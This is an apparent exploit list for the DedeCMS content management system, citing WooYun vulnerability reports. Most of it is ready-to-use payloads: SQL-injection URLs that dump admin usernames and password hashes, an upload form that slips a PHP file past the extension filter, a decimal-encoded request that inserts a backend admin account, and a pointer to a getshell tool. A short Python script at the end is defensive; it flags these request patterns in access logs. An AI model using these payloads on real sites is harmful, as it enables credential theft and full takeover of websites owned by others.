1. http://www.123.com/plus/feedback.php?aid=11552
Reference: http://www.wooyun.org/bugs/wooyun-2013-017816
POC:
http://www.123.com/plus/feedback.php?validate=ZFCU&action=send&comtype=comments&fid=1&isconfirm=yes&msg=90sec&typeid=0%27%2C%273%27%2C%274%27%2C%275%27%2C%270%27%2C%271351739660%27%2C+%270%27%2C%270%27%2C%270%27%2C%270%27%2C%270%27%2C%27aaaaaa%27%29%2C+%28%2711552%27%2C%272%27%2C@%60%27%60%2C%274%27%2C%275%27%2C%271%27%2C%271351739660%27%2C+%270%27%2C%270%27%2C%270%27%2C%270%27%2C%270%27%2C%28SELECT+concat%28uname%2C0x5f%2Cpwd%2C0x5f%29+FROM+%60%23@__admin%60+limit+3%2C1%29%29%23
2. http://www.123.com/plus/search.php?keyword=as
Reference: http://www.wooyun.org/bugs/wooyun-2013-017613
POC:
http://www.123.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
3. http://www.123.com/member/ajax_membergroup.php
Note: if the vulnerability is present, this directly dumps the admin account.
POC:
http://www.123.com/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'`
4. Upload vulnerability script (requires the site to have new member registration enabled; register and log in, no email verification needed)
<form action="http://www.123.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">
  file:<input name="uploadfile" type="file" /><br>
  newname:<input name="newname" type="text" value="help.Php"/>
  <button class="button2" type="submit">Submit</button><br><br>
  1. You must be a logged-in user.<br>
  2. Change the extension of the PHP file to be uploaded to one of "zip|gz|rar|iso|doc|xsl|ppt|wps".<br>
  3. newname is the file name after upload; use an uppercase extension such as "Php" to bypass the check.<br>
</form>
5. /data/mysql_error_trace.inc leaks the admin backend path and related information
Reference: http://www.wooyun.org/bugs/wooyun-2013-022534
6. Reference: http://zone.wooyun.org/content/4164
Note: directly overwrites/adds the backend login user spider with password admin; tested successfully on v57 and v57 sp1
POC:
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
7. POC:
http://www.123.com/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat(0x3C6162633E,group_concat(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20from%20`%23@__admin`%23%22;
8. getshell exploit based on the DedeCMS variable overwrite vulnerability
Reference: http://zone.wooyun.org/content/4231
Tool download: dede_exp.zip
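As an added defensive example (not part of the original list), the script below scans web access-log lines for the request patterns the POCs above rely on (the `#@__` table-prefix placeholder, the @`'` quoting trick, `_FILES[...]` spoofing via the query string, the `rs[code]=../` include path) and decodes the `arrs1[]`/`arrs2[]` decimal-ASCII arrays of item 6 so an analyst can read which variable a request tried to overwrite. The log lines are constructed, and the log is assumed to be in combined format with the full request line.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request-level indicators taken from the POC URLs listed on this page.
INDICATORS = {
    "prefix_placeholder": re.compile(r"#@__"),           # `#@__admin` table-prefix trick
    "backtick_quote": re.compile(r"@`\\?'`"),            # @`'` / @`\'` quote-filter bypass
    "files_override": re.compile(r"_FILES\[\w+\]\["),    # $_FILES spoofing from the query string
    "traversal_in_rs": re.compile(r"rs\[code\]=\.\./"),  # carbuyaction.php include path
}
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP')  # request target of a combined-format line

def decode_arrs(query):
    """Decode download.php-style arrsN[] lists (decimal ASCII codes) into strings."""
    out = {}
    for key, vals in parse_qs(query, keep_blank_values=True).items():
        if re.fullmatch(r"arrs\d+\[\]", key) and all(v.isdigit() for v in vals):
            out[key] = "".join(chr(int(v)) for v in vals)
    return out

def analyse_request(target):
    """Return the indicator names (and any decoded arrs) for one request target."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(unquote(target))]
    arrs = decode_arrs(urlsplit(target).query)
    if arrs:
        hits.append("arrs_variable_overwrite")
    return {"hits": hits, "arrs": arrs}

def scan_log(lines):
    """Return (request target, analysis) for every line that trips an indicator."""
    findings = []
    for target in (m.group(1) for m in map(LOG_RE.search, lines) if m):
        result = analyse_request(target)
        if result["hits"]:
            findings.append((target, result))
    return findings

# Constructed sample access-log lines (not real traffic), shaped like the POCs above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Nov/2013:10:00:01 +0800] "GET /plus/search.php?keyword=as HTTP/1.1" 200 812',
    '10.0.0.9 - - [01/Nov/2013:10:00:07 +0800] "GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98'
    '&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120 HTTP/1.1" 200 44',
    '10.0.0.9 - - [01/Nov/2013:10:00:09 +0800] "GET /plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][tmp_name]=aa%27 HTTP/1.1" 200 44',
]

if __name__ == "__main__":
    for target, res in scan_log(SAMPLE_LOG):
        print(target, res["hits"], res["arrs"])
```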